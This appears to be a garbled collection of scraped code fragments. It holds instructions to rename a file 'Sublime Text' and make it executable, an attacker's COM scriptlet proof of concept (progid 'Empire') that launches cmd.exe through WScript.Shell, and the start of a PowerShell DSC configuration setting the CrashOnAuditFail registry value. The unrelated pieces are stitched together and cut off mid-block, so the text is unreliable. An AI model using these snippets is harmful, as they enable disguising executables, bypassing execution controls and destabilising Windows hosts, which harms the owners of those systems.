MD5: 59bab8f71f8c096cd3f72cd73851515d
Rename it to: Sublime Text
Make it executable with: chmod u+x Sublime\ Text
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="Empire" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); |
| configuration DSCEARegistryTest1 { | |
| param([string[]]$ComputerName='localhost') | |
| Import-DscResource -ModuleName PSDesiredStateConfiguration | |
| Node $ComputerName { | |
| Registry 'CrashOnAuditFail' { | |
| Ensure = 'Present' | |
| Key = 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa' |